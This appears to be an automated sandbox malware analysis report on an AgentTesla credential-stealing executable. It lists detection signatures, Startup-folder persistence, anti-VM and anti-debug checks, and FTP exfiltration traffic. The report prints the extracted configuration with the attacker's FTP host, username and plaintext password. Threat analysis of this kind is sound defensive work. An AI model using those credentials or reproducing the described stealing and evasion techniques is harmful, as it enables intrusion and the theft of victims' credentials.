
Windows Analysis Report
RHOqJ5BrHW.exe

Overview

General Information

Sample name: RHOqJ5BrHW.exe (renamed because the original name is a hash value)
Original sample name: 382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d.exe
Analysis ID: 1588621
MD5: bc7fee37d8d779b635750bce96b9ecd9
SHA1: 7ea7eb2001c6a29d93f2d780dbf2ef37070689be
SHA256: 382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d
Tags: exe, user-zhuzhu0009

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • RHOqJ5BrHW.exe (PID: 3348 cmdline: "C:\Users\user\Desktop\RHOqJ5BrHW.exe" MD5: BC7FEE37D8D779B635750BCE96B9ECD9)
    • unjuridically.exe (PID: 6948 cmdline: "C:\Users\user\Desktop\RHOqJ5BrHW.exe" MD5: BC7FEE37D8D779B635750BCE96B9ECD9)
      • RegSvcs.exe (PID: 5728 cmdline: "C:\Users\user\Desktop\RHOqJ5BrHW.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • unjuridically.exe (PID: 4564 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: BC7FEE37D8D779B635750BCE96B9ECD9)
      • RegSvcs.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
Source | Rule | Description | Author | Strings
00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | -
00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | see below
  • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen | see below
  • 0x3196b:$s2: GetPrivateProfileString
  • 0x31018:$s3: get_OSFullName
  • 0x32706:$s5: remove_Key
  • 0x328b3:$s5: remove_Key
  • 0x33795:$s6: FtpWebRequest
  • 0x34717:$s7: logins
  • 0x34c89:$s7: logins
  • 0x3798e:$s7: logins
  • 0x37a4c:$s7: logins
  • 0x393a1:$s7: logins
  • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
(22 entries in total; the remaining entries are not shown here)
Source | Rule | Description | Author | Strings
5.2.unjuridically.exe.1f30000.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
5.2.unjuridically.exe.1f30000.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | -
5.2.unjuridically.exe.1f30000.1.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
5.2.unjuridically.exe.1f30000.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | see below
  • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.unjuridically.exe.1f30000.1.raw.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen | see below
  • 0x3196b:$s2: GetPrivateProfileString
  • 0x31018:$s3: get_OSFullName
  • 0x32706:$s5: remove_Key
  • 0x328b3:$s5: remove_Key
  • 0x33795:$s6: FtpWebRequest
  • 0x34717:$s7: logins
  • 0x34c89:$s7: logins
  • 0x3798e:$s7: logins
  • 0x37a4c:$s7: logins
  • 0x393a1:$s7: logins
  • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
(18 entries in total; the remaining entries are not shown here)

                System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 5968, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 5968, ProcessName: wscript.exe

                Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe, ProcessId: 6948, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T03:19:36.997199+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 162.241.62.63 | 21 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T03:19:37.399129+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 162.241.62.63 | 35211 | TCP
2025-01-11T03:19:37.404623+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 162.241.62.63 | 35211 | TCP


                AV Detection

Source: RHOqJ5BrHW.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Avira: detection malicious, Label: HEUR/AGEN.1319212
Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Virustotal: Detection: 62%
Source: RHOqJ5BrHW.exe | ReversingLabs: Detection: 57%
Source: RHOqJ5BrHW.exe | Virustotal: Detection: 62%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Joe Sandbox ML: detected
Source: RHOqJ5BrHW.exe | Joe Sandbox ML: detected
Source: RHOqJ5BrHW.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP | source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_009C6CA9
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009C60DD
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009C63F9
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009CEB60
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009CF5FA
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009CF56F FindFirstFileW,FindClose,0_2_009CF56F
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1B2F
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1C8A
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009D1F94
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00466CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00466CA9
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_004660DD
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_004663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_004663F9
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0046EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0046EB60
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0046F56F FindFirstFileW,FindClose,2_2_0046F56F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0046F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0046F5FA
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00471B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00471B2F
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00471C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00471C8A
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00471F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00471F94

                Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49714 -> 162.241.62.63:35211
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49708 -> 162.241.62.63:21
Source: Yara match | File source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | TCP traffic: 192.168.2.5:49714 -> 162.241.62.63:35211
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 162.241.62.63
Source: unknown | DNS query: name: ip-api.com
Source: unknown | FTP traffic detected: 162.241.62.63:21 -> 192.168.2.5:49708 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 2 of 150 allowed. 220-Local time is now 20:19. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009D4EB5
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009D6B0C
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009D6D07
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_00476D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00476D07
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009D6B0C
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_009C2B37
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: 0_2_009EF7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009EF7FF
Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | Code function: 2_2_0048F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0048F7FF

                System Summary

Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\Desktop\RHOqJ5BrHW.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00983D19
Source: RHOqJ5BrHW.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: RHOqJ5BrHW.exe, 00000000.00000000.2040085321.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_e212fbdb-a
